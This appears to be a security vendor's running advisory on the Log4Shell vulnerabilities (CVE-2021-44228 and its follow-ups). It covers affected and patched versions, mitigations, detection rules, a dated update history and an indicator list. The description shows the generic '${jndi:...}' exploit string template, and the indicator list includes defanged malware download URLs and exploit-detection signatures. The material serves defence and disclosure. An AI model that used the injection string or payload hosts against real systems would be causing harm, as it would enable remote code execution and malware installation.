Updated 12/29

A zero-day vulnerability involving the Log4j 2 utility was publicly disclosed on December 9, 2021, via the Apache GitHub. Log4j 2 is an open-source Java logging library integrated in many enterprise applications, as well as open-source software and other services. The widespread use and configuration variables make this is a high impact threat.

ReliaQuest has been tracking the vulnerability since it was first disclosed. This blog will provide ongoing status updates and recommendations for mitigating the impact of Log4j in customer environments. Additional details on the Log4Shell vulnerability and tools to respond are available in Log4Shell and ReliaQuest Solutions. 

The information below is accurate as of Wednesday, December 29

Latest Updates

  • A new version of Log4J was released (2.17.1) that patches a newly identified vulnerability (CVE-2021-44832) which enables remote code execution when the following non-default pre-conditions are met [Source 20]:
    • The configuration of Log4J is being loaded from a remote server
      OR
    • A threat actor has permissions to alter the Log4J configuration file AND the JDBC log appender feature is used with a dynamic URL address.
  • The newly identified exploit still uses outbound LDAP in its attack chain, meaning that mitigations and threat hunts (‘Log4j RCE Response Traffic Hunt’, available in GreyMatter) are still applicable to this vulnerability.
  • Due to the highly specific pre-conditions and lower CVSS score, ReliaQuest assesses that this vulnerability will not be widely exploited as CVE-2021-44228.

Affected Versions

  • 2.17.0 (CVE-2021-44832: Remote Code Execution, CVSS 6.6 Medium)
  • 2.16.0 (CVE-2021-45105: Denial-of-Service, CVSS 7.5 High)
  • 2.15.0 (CVE-2021-45046: Limited Remote Code Execution, CVSS 9.0 Critical)
  • <2.15.0 (CVE-2021-44228: Remote Code Execution, CVSS 10.0 Critical)

Patched Versions

  • 2.17.1

Standing Customer Recommendations

  • Update Log4j to version 2.17.1.
  • Configure perimeter controls (WAF, IDS/IPS) to block Log4j related signatures.
  • Ensure logging of web infrastructure (e.g., servers, reverse proxies, load balancers), prioritizing vulnerable externally facing and critical internal hosts.
  • Ensure endpoint visibility on all systems, prioritizing vulnerable externally facing and critical internal hosts.
  • Provide ReliaQuest a list of vulnerable hosts and vulnerability scanners (tracking tickets created).
  • If possible, block outbound RMI, LDAP, and DNS traffic.
  • Investigate anomalous internal scanning activity for evidence of the internal WebSocket attack vector [Source 13].

ReliaQuest Detections

ReliaQuest is deploying the following detection capabilities:

  • IOC matches for systems known to exploit this vulnerability
  • RQ-SC-002650-07 – Log4j User Agent RCE
  • RQ-SC-002652-02 – Log4j Scanning and Response Traffic
  • RQ-SH-002659-01 – Java Spawning Suspicious Child Processes – has been deployed for customers where Carbon Black Threat Hunter is managed by ReliaQuest.

ReliaQuest GreyMatter Hunt

ReliaQuest is actively hunting in both SIEM and EDR customer environments for activity related to this campaign, with a focus on successful exploitation using host-based telemetry.

  • Log4j RCE (CVE-2021-44228) campaign is available for customers to run through GreyMatter Hunt.

ReliaQuest SIEM and EDR Patching

  • ReliaQuest has been in communication with SIEM and EDR Original Equipment Manufacturer (OEM) vendors to understand their response and working alongside customers to mitigate any risk. See latest patch updates above.

———————————————————————————————

Description

A remote code execution vulnerability was discovered in Apache Log4j and is being actively exploited. When passing crafted parameters to a system running the vulnerable version of this code, the string will execute. Current exploitation of this vulnerability is leveraging LDAP calls to malicious servers that redirects to malicious Java class files for execution. Other methods of exploitation exist as well that are still being discovered. As of this writing, a typical observance of this attack contains the following in a web request log: “${jndi:[PROTOCOL]://[MALICIOUS SERVER]/}”. Indicators of Compromise (IOCs) are added to the ReliaQuest Emergency Feed as they are identified. ReliaQuest has already identified IP addresses conducting scanning activities and have added these IP addresses to our detection feeds.

Vulnerability Discovery

NOTE: Some tools can leak information about your environment. ReliaQuest recommends evaluating the impact to your organization before using them.

  • CISA has compiled a list of affected software/systems listing the vendor, product, version, and vulnerability status [Source 9].
  • An open source scanner for identifying vulnerable hosts is available here [Source 10].
  • Another tool was published to GitHub for testing the exploit against your systems [Source 11].
  • Many vulnerability scanners have developed plugins to scan and identify vulnerable software. Check with your preferred scanner.

Helpful Resources

  • Blog covering ReliaQuest’s Log4Shell discovery solution (https://www.reliaquest.com/blog/log4shell-overview-and-reliaquest-solutions/)
  • Splunk patching guide (https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html)
  • IBM QRadar patching guide (https://www.ibm.com/support/pages/node/6528440?myns=swgother&mynp=OCSSBQAC&mync=E&cm_sp=swgother-_-OCSSBQAC-_-E)
  • CISA vendor status GitHub site (https://github.com/cisagov/log4j-affected-db)

 

Sources

[1] https://www.lunasec.io/docs/blog/log4j-zero-day/

[2] https://github.com/tangxiaofeng7/apache-log4j-poc

[3] https://logging.apache.org/log4j/2.x/security.html

[4] https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

[6] https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/

[7] https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

[8] https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/

[9] https://github.com/cisagov/log4j-affected-db

[10] https://github.com/fullhunt/log4j-scan

[11] https://github.com/huntresslabs/log4shell-tester

[12] https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/

[13] https://www.blumira.com/analysis-log4shell-local-trigger/

[14] https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi

[15] https://github.com/curated-intel/Log4Shell-IOCs

[16] https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html

[17] https://www.ibm.com/support/pages/node/6528440?myns=swgother&mynp=OCSSBQAC&mync=E&cm_sp=swgother-_-OCSSBQAC-_-E

[18] https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/

[19] https://www.cisa.gov/uscert/ncas/alerts/aa21-356a

[20] https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/

Severity Criteria
✓ This technique can propagate without user interaction
✓ This technique can cause serious impacts
✓ This technique affects nearly all Java platforms
✓ This technique is a major security event

Advisory History

  • 12/27 21:00 UTC No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. The ReliaQuest Threat Management Team will continue to monitor the landscape for any significant threat events or the announcement of any major vulnerability changes. Given the lack of significant updates in the past 5 days, ReliaQuest is transitioning from a daily advisory update cadence to one of on significant threat event, or vulnerability change. For customers that have been following our daily advisory updates, the implicit assumption will be “no significant updates” unless otherwise noted in a new advisory.
  • 12/26 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest will continue to monitor the situation closely as this could change at any time.
  • 12/25 20:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest will continue to monitor the situation closely as this could change at any time.
  • 12/24 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest will continue to monitor the situation closely as this could change at any time.
  • 12/23 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest and other security vendors like Cloudflare have noticed a decrease in exploit attempts compared to last week.
  • 12/22 21:00 UTC – CISA has released a joint advisory covering in-depth technical details and mitigations for the Log4J vulnerability [Source 19]. Threat actors have been observed using Log4Shell as a means to pivot/move laterally to vulnerable internal applications like VMware vCenter [Source 18]. LogRhythm Elasticsearch versions prior to 5.6.10 require additional remediation steps to mitigate vulnerability to CVE-2021-44228. ReliaQuest customers requiring additional remediation steps have been reached out to. More information is available within the LogRhythm community website. ReliaQuest is actively evaluating additional detection within Endpoint Detection and Response (EDR) technologies for this threat. Customers owning Carbon Black Threat Hunter have received the rule ‘RQ-SH-002659-01 – Java Spawning Suspicious Child Processes’. Customers owning SentinelOne managed by ReliaQuest have or will receive the rule ‘RQ-SH-002659-01 – Java Spawning Suspicious Child Processes’. This rule is not eligible for deployment via CrowdStrike but has been incorporated into Threat Hunting (see additional information below).
  • 12/21 22:00 UTC – No significant updates regarding the vulnerability itself. ReliaQuest is actively evaluating additional detection within Endpoint Detection and Response (EDR) technologies for this threat. Customers owning Carbon Black Threat Hunter managed by ReliaQuest have(will) receive the rule ‘RQ-SH-002659-01 – Java Spawning Suspicious Child Processes’. A new version of Splunk Enterprise was made available which updates the Log4j package to 2.16. ReliaQuest is recommending to not install this release. Splunk has stated that they are working on a release that will implement Log4j 2.17 & once this release is made ReliaQuest will validate its functionality and then make the recommendation to customers to upgrade their Splunk deployments [Source 16]. IBM released an interim solution to a Log4J vulnerability in the Risk Manager component of QRadar. Version 7.4.3 FixPack 4 and version 7.3.3 FixPack 10 are available for QRadar. It is recommended to apply the applicable fix pack if your organization uses the Risk Manager component of QRadar. Otherwise, it is not recommended to install the update as no attack vector is present and it only updates Log4j to 2.16 rather than 2.17. ReliaQuest will validate any additional updates and continue to advise [Source 17]. LogRhythm has released that the additional vulnerabilities (CVE-2021-45046 and CVE-2021-45105) appear to have been remediated
  • 12/20 22:00 UTC – No significant updates regarding the vulnerability, though more information has come to light on the threats using this vulnerability.. ReliaQuest has identified threats are using vulnerabilities in Log4J to drop binaries related to ransomware, Cobalt Strike, or cryptocurrency miners [Source 15]. Log4j version 2.17.0 was released on 12/18, patching Denial-of-Service in 2.16.0 (CVE-2021-45105) [Source 3].
  • 12/18 00:00 UTC – A new attack vector has been identified that has increased the attack surface of these vulnerabilities. A user browsing to a malicious webpage can execute Javascript making WebSocket connections to internal hosts that would issue HTTP requests containing the exploit string. The vulnerabilities haven’t changed, but hosts that are not publicly facing can now be targeted more easily. Exercise additional vigilance when investigating internal traffic matching the signatures of this exploit as it could be related to this new attack vector.
  • 12/17 18:00 UTC – A limited Denial-of-Service vulnerability has been discovered in version 2.16.0 that will be fixed in the upcoming 2.17.0 release. We still recommend updating to 2.16.0 until 2.17.0 is released, as 2.16.0 fixes more-severe Remote Code Execution vulnerabilities. The Denial-of-Service vulnerability in version 2.16.0 can be mitigated by removing the JNDI classes entirely, but this has the potential to introduce other application-breaking changes.
  • 12/17 15:00 UTC – The CVSS score for CVE-2021-45046 has been updated from 3.7 (limited Denial-of-Service) to 9.0 (limited Remote Code Execution). Message lookups can still be manually enabled in non-default configurations or occur in places not affected by the formatMsgNoLookups flag. Further, a bypass for the localhost network connection restriction has been identified which would allow these lookups to connect outbound. We highly recommend updating Log4j to version 2.16.0 to remove support for message lookup patterns entirely and disable JNDI functionality by default.
  • 12/14 22:30 UTC – A new vulnerability – CVE-2021-45046 – was identified in Log4j version 2.15.0 that enables a Denial-of-Service scenario. Patching systems leveraging Log4j to version 2.16.0 is the best option as it provides some additional hardening features related to this vulnerability.The following MITRE techniques are leveraged:
    T1203 – Exploitation for Client Execution

ReliaQuest has the following detection capabilities available:
Building Block: 002650 – Log4j User Agent RCE
Hunt: 002651 – log4j RCE (CVE-2021-44228)
Rule: 002652 – Log4j Scanning and Response Traffic

ReliaQuest has the following IOCs available within GreyMatter Intel:
Signature: 2034647
Signature: 2034648
Signature: 2034649
Domain: bingsearchlib[.]com
Signature: 91991
Signature: 2034650
Signature: 2034652
Signature: 2034651
Hash: e3eb1e98ca477918154b9ed7bcc2b7fe757c1020
Hash: 4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c
Hash: f6e51ea341570c6e9e4c97aee082822b
Hash: 9147d834f4cb7047a6e6ab96565868c6fede373e
Hash: eb76b7fb22dd442ba7d5064dce4cec79e6db745ace7019b6dfe5642782bf8660
Hash: c717c47941c150f867ce6a62ed0d2d35
Hash: f568eb59fd37b2fe37db730292594d875d3a11e8
Hash: e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1
Hash: 1718956642fbd382e9cde0c6034f0e21
Hash: 799dd1a2181eb252499b775119b6b5bef4760b89
Hash: c70e6f8edfca4be3ca0dc2cfac8fddd14804b7e1e3c496214d09c6798b4620c5
Hash: cf2ce888781958e929be430de173a0f8
Hash: e851126ef41e3dc474238d3160f4b0e7e3bbb7ec
Hash: 3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26
Hash: 40e3b969906c1a3315e821a8461216bb
Hash: 0fb3020e3c38de5beae21622a910754241859d42
Hash: 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
Hash: 6d275af23910c5a31b2d9684bbb9c6f3
Hash: 777c54e96d29a0ed6ddf9698c86afb74322c130f
Hash: 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
Hash: 1348a00488a5b3097681b6463321d84c
Hash: 1d1866b00f948c103a9076b39061bde5c1f68350
Hash: 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
Hash: 648effa354b3cbaad87b45f48d59c616
Hash: 0194637f1e83c2efc8bcda8d20c446805698c7bc
Hash: 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
Hash: 2fbc3b9421bc770831a724d9e467c7dbc220dc41c0ca21d33a45893be4ff82d4
Hash: 95d9a068529dd2ea4bb4bef644f5c4f5
Hash: 17542b2d0614bb363614e734ea1dde508cb7496b
Hash: 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
URL: https://62[.]210[.]130[.]250/lh[.]sh
URL: https://93[.]189[.]42[.]8/kinsing
Signature: 58722
Signature: 58723
Signature: 58724
Signature: 58725
Signature: 58726
Signature: 58727
Signature: 58728
Signature: 58729
Signature: 58730
Signature: 58731
Signature: 58732
Signature: 58733
Signature: 58734
Signature: 58735
Signature: 58736
Signature: 58737
Signature: 58738
Signature: 58739
Signature: 58740
Signature: 58741
Signature: 58742
Signature: 58743
Signature: 58744
Signature: 300055
Signature: 300056
Signature: 300057
Signature: 300058
Signature: Java[.]Exploit[.]CVE_2021_44228-9914600-1
Signature: Java[.]Exploit[.]CVE_2021_44228-9914601-1
Signature: Unix[.]Malware[.]Mirai-9914842-0
Signature: Unix[.]Malware[.]Mirai-9914843-0
Signature: Linux[.]PossibleKinsingMalware[.]ioc
Signature: 58751
Signature: W32[.]PossibleTomcatLog4ShellExploit[.]ioc
Signature: Java[.]Exploit[.]CVE_2021_44228-9914600-2
Signature: Java[.]Exploit[.]CVE_2021_44228-9914601-4
Signature: Java[.]Exploit[.]CVE_2021_44228-9915330-0
Signature: apache: Apache[.]Log4j[.]Error[.]Log[.]Remote[.]Code[.]Execution
Signature: ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)